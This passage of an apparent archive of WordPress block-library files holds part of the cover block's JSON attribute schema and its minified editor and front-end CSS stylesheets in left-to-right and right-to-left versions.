		},
		"customOverlayColor": {
			"type": "string"
		},
		"isUserOverlayColor": {
			"type": "boolean"
		},
		"backgroundType": {
			"type": "string",
			"default": "image"
		},
		"focalPoint": {
			"type": "object"
		},
		"minHeight": {
			"type": "number"
		},
		"minHeightUnit": {
			"type": "string"
		},
		"gradient": {
			"type": "string"
		},
		"customGradient": {
			"type": "string"
		},
		"contentPosition": {
			"type": "string"
		},
		"isDark": {
			"type": "boolean",
			"default": true
		},
		"allowedBlocks": {
			"type": "array"
		},
		"templateLock": {
			"type": [ "string", "boolean" ],
			"enum": [ "all", "insert", "contentOnly", false ]
		},
		"tagName": {
			"type": "string",
			"default": "div"
		}
	},
	"usesContext": [ "postId", "postType" ],
	"supports": {
		"anchor": true,
		"align": true,
		"html": false,
		"shadow": true,
		"spacing": {
			"padding": true,
			"margin": [ "top", "bottom" ],
			"blockGap": true,
			"__experimentalDefaultControls": {
				"padding": true,
				"blockGap": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"style": true,
			"width": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"style": true,
				"width": true
			}
		},
		"color": {
			"__experimentalDuotone": "> .wp-block-cover__image-background, > .wp-block-cover__video-background",
			"heading": true,
			"text": true,
			"background": false,
			"__experimentalSkipSerialization": [ "gradients" ],
			"enableContrastChecker": false
		},
		"dimensions": {
			"aspectRatio": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"layout": {
			"allowJustification": false
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-cover-editor",
	"style": "wp-block-cover"
}
cover/editor-rtl.min.css000060400000003431151330427370011245 0ustar00.editor-styles-wrapper .wp-block-cover{box-sizing:border-box}.wp-block-cover.is-placeholder{align-items:stretch;display:flex;min-height:240px;padding:0!important}.wp-block-cover.is-placeholder .components-placeholder.is-large{justify-content:flex-start;z-index:1}.wp-block-cover.is-placeholder:focus:after{min-height:auto}.wp-block-cover.components-placeholder h2{color:inherit}.wp-block-cover.is-transient{position:relative}.wp-block-cover.is-transient:before{background-color:#fff;content:"";height:100%;opacity:.3;position:absolute;width:100%;z-index:1}.wp-block-cover .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);z-index:1}.wp-block-cover .wp-block-cover__inner-container{margin-left:0;margin-right:0;text-align:right}.wp-block-cover .wp-block-cover__placeholder-background-options{width:100%}.wp-block-cover .wp-block-cover__image--placeholder-image{bottom:0;left:0;position:absolute;right:0;top:0}[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{max-width:420px;width:100%}.block-library-cover__reset-button{margin-right:auto}.block-library-cover__resize-container{bottom:0;left:0;min-height:50px;position:absolute!important;right:0;top:0}.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{overflow:visible;pointer-events:none}.wp-block-cover>.components-drop-zone .components-drop-zone__content{opacity:.8!important}.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{background-attachment:scroll}.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){margin-top:24px}cover/style.min.css000060400000043036151330427370010325 0ustar00.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:initial}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;width:100%;z-index:1}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover__image-background,.wp-block-cover__video-background{z-index:0}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-left:0;text-align:left}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-right:0;text-align:right}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){color:inherit}cover/editor.min.css000060400000003427151330427370010453 0ustar00.editor-styles-wrapper .wp-block-cover{box-sizing:border-box}.wp-block-cover.is-placeholder{align-items:stretch;display:flex;min-height:240px;padding:0!important}.wp-block-cover.is-placeholder .components-placeholder.is-large{justify-content:flex-start;z-index:1}.wp-block-cover.is-placeholder:focus:after{min-height:auto}.wp-block-cover.components-placeholder h2{color:inherit}.wp-block-cover.is-transient{position:relative}.wp-block-cover.is-transient:before{background-color:#fff;content:"";height:100%;opacity:.3;position:absolute;width:100%;z-index:1}.wp-block-cover .components-spinner{left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);z-index:1}.wp-block-cover .wp-block-cover__inner-container{margin-left:0;margin-right:0;text-align:left}.wp-block-cover .wp-block-cover__placeholder-background-options{width:100%}.wp-block-cover .wp-block-cover__image--placeholder-image{bottom:0;left:0;position:absolute;right:0;top:0}[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{max-width:420px;width:100%}.block-library-cover__reset-button{margin-left:auto}.block-library-cover__resize-container{bottom:0;left:0;min-height:50px;position:absolute!important;right:0;top:0}.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{overflow:visible;pointer-events:none}.wp-block-cover>.components-drop-zone .components-drop-zone__content{opacity:.8!important}.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{background-attachment:scroll}.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){margin-top:24px}cover/style-rtl.min.css000060400000043072151330427370011124 0ustar00.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;direction:ltr;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:initial}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover 